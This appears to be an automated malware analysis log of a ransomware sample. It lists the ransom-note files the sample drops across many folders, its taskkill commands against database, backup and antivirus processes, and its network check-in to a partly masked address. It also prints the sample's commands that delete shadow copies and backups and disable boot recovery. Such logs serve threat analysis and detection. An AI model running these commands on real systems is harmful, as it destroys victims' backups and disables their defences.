Technical Information
- <Drive name for removable media>:\archer.avi
- <Drive name for removable media>:\hypothyroidism_slides.pptx
- <Drive name for removable media>:\sdksampleprivdeveloper.cer
- <Drive name for removable media>:\contosoroot.cer
- <Drive name for removable media>:\contoso.cer
- <Drive name for removable media>:\sdksampleunprivdeveloper.cer
- <Drive name for removable media>:\dashborder_120.bmp
- <Drive name for removable media>:\dashborder_144.bmp
- <Drive name for removable media>:\dashborder_96.bmp
- <Drive name for removable media>:\dial.bmp
- <Drive name for removable media>:\coffee.bmp
- <Drive name for removable media>:\dialmap.bmp
- <Drive name for removable media>:\default.bmp
- <Drive name for removable media>:\toolbar.bmp
- <Drive name for removable media>:\000814251_video_01.avi
- <Drive name for removable media>:\correct.avi
- <Drive name for removable media>:\join.avi
- <Drive name for removable media>:\split.avi
- <Drive name for removable media>:\indogerman2010.pptx
- <Drive name for removable media>:\stoc13_ml_quoc_le.pptx
- System Restore (SR)
- '<SYSTEM32>\taskkill.exe' /F /T /IM wxServer*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Intuit.QuickBooks.FCS*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBIDPService*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sqlbrowser*
- '<SYSTEM32>\taskkill.exe' /F /T /IM RTVscan*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Culserver*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sqladhlp*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sqlagent*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Sqlservr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SavRoam*
- '<SYSTEM32>\taskkill.exe' /F /T /IM ccSetMgr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM ccEvtMgr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM wrapper*
- '<SYSTEM32>\taskkill.exe' /F /T /IM ONENOTEM*
- '<SYSTEM32>\taskkill.exe' /F /T /IM fbserver*
- '<SYSTEM32>\taskkill.exe' /F /T /IM fbguard*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Simply.SystemTrayIcon*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SimplyConnectionManager*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBCFMonitorService*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sqlwriter*
- '<SYSTEM32>\taskkill.exe' /F /T /IM msmdsrv*
- '<SYSTEM32>\taskkill.exe' /F /T /IM tomcat6*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQLFDLauncher$SHAREPOINT*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQLFDLauncher$SBSMONITORING*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$SHAREPOINT*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$SBSMONITORING*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$MICROSOFT##SSEE*
- '<SYSTEM32>\taskkill.exe' /F /T /IM msftesql-Exchange*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQLServerADHelper100*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MySQL57*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
- '<SYSTEM32>\taskkill.exe' /F /T /IM FishbowlMySQL*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SQLAgent$VEEAMSQL2012*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$VEEAMSQL2012*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MSSQL$MICROSOFT##WID*
- '<SYSTEM32>\taskkill.exe' /F /T /IM dbeng8*
- '<SYSTEM32>\taskkill.exe' /F /T /IM dbsrv12*
- '<SYSTEM32>\taskkill.exe' /F /T /IM vmware-converter*
- '<SYSTEM32>\taskkill.exe' /F /T /IM vmware-usbarbitator64*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SQLAgent$SBSMONITORING*
- '<SYSTEM32>\taskkill.exe' /F /T /IM BrCcUxSys*
- '<SYSTEM32>\taskkill.exe' /F /T /IM BrCtrlCntr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM AdobeCollabSync*
- '<SYSTEM32>\taskkill.exe' /F /T /IM axlbridge*
- '<SYSTEM32>\taskkill.exe' /F /T /IM qbupdate*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBDBMgr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBW32*
- '<SYSTEM32>\taskkill.exe' /F /T /IM winword*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Defwatch*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Culture*
- '<SYSTEM32>\taskkill.exe' /F /T /IM supervise*
- '<SYSTEM32>\taskkill.exe' /F /T /IM RAgui*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sqlmangr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM wxServerView*
- '<SYSTEM32>\taskkill.exe' /F /T /IM mysql*
- '<SYSTEM32>\taskkill.exe' /F /T /IM mssql*
- '<SYSTEM32>\taskkill.exe' /F /T /IM msaccess*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sql*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBVSS*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBFCService*
- '<SYSTEM32>\taskkill.exe' /F /T /IM httpd*
- '<SYSTEM32>\taskkill.exe' /F /T /IM fdlauncher*
- '<SYSTEM32>\taskkill.exe' /F /T /IM MsDtSrvr*
- '<SYSTEM32>\taskkill.exe' /F /T /IM java*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sync-worker*
- '<SYSTEM32>\taskkill.exe' /F /T /IM sync-taskbar*
- '<SYSTEM32>\taskkill.exe' /F /T /IM AdobeIPCBroker*
- '<SYSTEM32>\taskkill.exe' /F /T /IM node*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Adobe CEF Helper*
- '<SYSTEM32>\taskkill.exe' /F /T /IM CoreSync*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Adobe Desktop Service*
- '<SYSTEM32>\taskkill.exe' /F /T /IM Creative Cloud*
- '<SYSTEM32>\taskkill.exe' /F /T /IM AutodeskDesktopApp*
- '<SYSTEM32>\taskkill.exe' /F /T /IM acwebbrowser*
- '<SYSTEM32>\taskkill.exe' /F /T /IM mysqld*
- '<SYSTEM32>\taskkill.exe' /F /T /IM QBDBMgrN*
- '<SYSTEM32>\taskkill.exe' /F /T /IM ZhuDongFangYu*
- '<SYSTEM32>\taskkill.exe' /F /T /IM GDscan*
- '<SYSTEM32>\taskkill.exe' /F /T /IM fdhost*
- '<SYSTEM32>\taskkill.exe' /F /T /IM wdswfsafe*
- '<SYSTEM32>\taskkill.exe' /F /T /IM 360doctor*
- '<SYSTEM32>\taskkill.exe' /F /T /IM 360se*
- '<SYSTEM32>\taskkill.exe' /F /T /IM InputPersonalization*
- '<SYSTEM32>\taskkill.exe' /F /T /IM SQLAgent$SHAREPOINT*
- %WINDIR%\logs\windowsbackup\wbadmin.0.etl
- %HOMEPATH%\searches\sgoznn-decrypt.hta
- C:\far2\addons\xlat\russian\sgoznn-decrypt.hta
- %HOMEPATH%\voip\sgoznn-decrypt.hta
- %HOMEPATH%\videos\sgoznn-decrypt.hta
- %HOMEPATH%\saved games\sgoznn-decrypt.hta
- %HOMEPATH%\pictures\sgoznn-decrypt.hta
- C:\users\public\libraries\sgoznn-decrypt.hta
- %HOMEPATH%\contacts\sgoznn-decrypt.hta
- C:\far2\addons\colors\custom_highlighting\sgoznn-decrypt.hta
- C:\far2\addons\colors\default_highlighting\sgoznn-decrypt.hta
- %HOMEPATH%\favorites\sgoznn-decrypt.hta
- %HOMEPATH%\music\sgoznn-decrypt.hta
- %HOMEPATH%\links\sgoznn-decrypt.hta
- %HOMEPATH%\downloads\sgoznn-decrypt.hta
- %HOMEPATH%\documents\sgoznn-decrypt.hta
- %HOMEPATH%\appdata\sgoznn-decrypt.hta
- C:\users\public\videos\sgoznn-decrypt.hta
- C:\far2\plugins\align\sgoznn-decrypt.hta
- C:\far2\encyclopedia\tap\sgoznn-decrypt.hta
- C:\far2\plugins\autowrap\sgoznn-decrypt.hta
- C:\far2\documentation\eng\sgoznn-decrypt.hta
- C:\far2\plugins\network\sgoznn-decrypt.hta
- C:\far2\plugins\ftp\sgoznn-decrypt.hta
- C:\users\public\music\sample music\sgoznn-decrypt.hta
- C:\far2\plugins\macroview\sgoznn-decrypt.hta
- C:\far2\plugins\hlfviewer\sgoznn-decrypt.hta
- C:\far2\plugins\proclist\sgoznn-decrypt.hta
- C:\far2\plugins\filecase\sgoznn-decrypt.hta
- C:\far2\pluginsdk\headers.c\sgoznn-decrypt.hta
- C:\far2\plugins\editcase\sgoznn-decrypt.hta
- C:\far2\pluginsdk\headers.pas\sgoznn-decrypt.hta
- C:\far2\plugins\drawline\sgoznn-decrypt.hta
- C:\far2\plugins\emenu\sgoznn-decrypt.hta
- C:\far2\plugins\arclite\sgoznn-decrypt.hta
- C:\far2\plugins\compare\sgoznn-decrypt.hta
- C:\far2\plugins\farcmds\sgoznn-decrypt.hta
- %HOMEPATH%\desktop\sgoznn-decrypt.hta
- C:\far2\plugins\brackets\sgoznn-decrypt.hta
- C:\far2\documentation\rus\sgoznn-decrypt.hta
- C:\users\public\pictures\sample pictures\sgoznn-decrypt.hta
- C:\users\public\recorded tv\sgoznn-decrypt.hta
- C:\users\public\pictures\sgoznn-decrypt.hta
- C:\users\public\music\sgoznn-decrypt.hta
- %HOMEPATH%\sgoznn-decrypt.hta
- C:\far2\addons\macros\sgoznn-decrypt.hta
- C:\users\public\sgoznn-decrypt.hta
- C:\users\default\sgoznn-decrypt.hta
- C:\far2\sgoznn-decrypt.hta
- C:\recovery\1195d5a8-f371-11e4-9c00-dd3082671db2\sgoznn-decrypt.hta
- C:\totalcmd\sgoznn-decrypt.hta
- C:\far2\addons\sgoznn-decrypt.hta
- C:\users\sgoznn-decrypt.hta
- C:\recovery\sgoznn-decrypt.hta
- <Current directory>\sgoznn-decrypt.hta
- D:\sgoznn-decrypt.hta
- C:\sgoznn-decrypt.hta
- %TEMP%\boot.sys:tpupnbvzicwro
- %TEMP%\boot.sys:ivrhwmenumbuocvak
- %TEMP%\boot.sys:xbcqjlijd
- %TEMP%\boot.sys:iykxevszimranzpu
- C:\far2\addons\setup\sgoznn-decrypt.hta
- C:\far2\addons\colors\sgoznn-decrypt.hta
- C:\far2\documentation\sgoznn-decrypt.hta
- C:\far2\fexcept\sgoznn-decrypt.hta
- C:\users\public\downloads\sgoznn-decrypt.hta
- C:\users\public\documents\sgoznn-decrypt.hta
- C:\users\public\desktop\sgoznn-decrypt.hta
- C:\users\default\videos\sgoznn-decrypt.hta
- C:\users\default\saved games\sgoznn-decrypt.hta
- C:\users\default\pictures\sgoznn-decrypt.hta
- C:\users\default\music\sgoznn-decrypt.hta
- C:\users\default\links\sgoznn-decrypt.hta
- C:\users\default\favorites\sgoznn-decrypt.hta
- C:\users\default\documents\sgoznn-decrypt.hta
- C:\users\default\downloads\sgoznn-decrypt.hta
- C:\users\default\desktop\sgoznn-decrypt.hta
- C:\far2\pluginsdk\sgoznn-decrypt.hta
- C:\far2\plugins\sgoznn-decrypt.hta
- C:\users\default\appdata\sgoznn-decrypt.hta
- C:\far2\addons\shell\sgoznn-decrypt.hta
- C:\far2\addons\xlat\sgoznn-decrypt.hta
- C:\far2\encyclopedia\sgoznn-decrypt.hta
- C:\users\public\favorites\sgoznn-decrypt.hta
- C:\far2\plugins\tmppanel\sgoznn-decrypt.hta
- from %WINDIR%\logs\windowsbackup\wbadmin.0.etl to %WINDIR%\logs\windowsbackup\wbadmin.1.etl
- from %WINDIR%\logs\windowsbackup\wbadmin.1.etl to %WINDIR%\logs\windowsbackup\wbadmin.2.etl
- %WINDIR%\logs\windowsbackup\wbadmin.0.etl
- %WINDIR%\logs\windowsbackup\wbadmin.1.etl
- '21#.#.117.26':80
- '<LOCALNET>.30.1':135
- http://21#.#.117.26/gateinfo
- ClassName: '' WindowName: ''
- '<SYSTEM32>\cmd.exe' /C wmic.exe SHADOWCOPY DELETE /nointeractive
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBIDPService*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sqlbrowser*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM RTVscan*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Culserver*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sqladhlp*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sqlagent*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Sqlservr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SavRoam*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM ccSetMgr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sync-taskbar*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM ccEvtMgr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM ONENOTEM*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM fbserver*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM fbguard*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Simply.SystemTrayIcon*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SimplyConnectionManager*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM BrCcUxSys*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM BrCtrlCntr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM AdobeCollabSync*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM InputPersonalization*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM wrapper*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sync-worker*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Intuit.QuickBooks.FCS*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM FishbowlMySQL*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQLFDLauncher$SHAREPOINT*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQLFDLauncher$SBSMONITORING*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$SHAREPOINT*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$SBSMONITORING*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$MICROSOFT##SSEE*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM msftesql-Exchange*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SQLAgent$KAV_CS_ADMIN_KIT*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQLServerADHelper100*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$KAV_CS_ADMIN_KIT*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sqlwriter*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBCFMonitorService*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SQLAgent$VEEAMSQL2012*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$VEEAMSQL2012*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MSSQL$MICROSOFT##WID*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM dbeng8*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM dbsrv12*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM vmware-converter*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM vmware-usbarbitator64*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM tomcat6*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM msmdsrv*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MySQL57*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM AdobeIPCBroker*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM node*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Adobe CEF Helper*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sqlmangr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM wxServerView*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM mysql*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM mssql*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM msaccess*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM sql*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBVSS*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBFCService*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM supervise*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM wxServer*
- '<SYSTEM32>\cmd.exe' /C <SYSTEM32>\vssvc.exe
- '<SYSTEM32>\cmd.exe' /C vssadmin.exe Delete Shadows /All /Quiet
- '<SYSTEM32>\bcdedit.exe' /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /C bcdedit.exe /set {default} bootstatuspolicy ignoreallfailures
- '<SYSTEM32>\cmd.exe' /C bcdedit.exe /set {default} recoveryenabled No
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTATEBACKUP -deleteOldest
- '<SYSTEM32>\cmd.exe' /C wbadmin DELETE SYSTEMSTATEBACKUP -deleteOldest
- '<SYSTEM32>\wbadmin.exe' DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\cmd.exe' /C wbadmin DELETE SYSTEMSTATEBACKUP
- '<SYSTEM32>\vssvc.exe'
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Culture*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM RAgui*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Defwatch*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM CoreSync*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM wdswfsafe*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Adobe Desktop Service*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM Creative Cloud*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM acwebbrowser*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM AutodeskDesktopApp*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM mysqld*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBDBMgrN*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM ZhuDongFangYu*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM GDscan*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM fdhost*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM 360doctor*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM winword*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM 360se*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM java*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM MsDtSrvr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM fdlauncher*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM httpd*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM axlbridge*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM qbupdate*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBDBMgr*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM QBW32*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SQLAgent$SBSMONITORING*
- '<SYSTEM32>\cmd.exe' /C taskkill /F /T /IM SQLAgent$SHAREPOINT*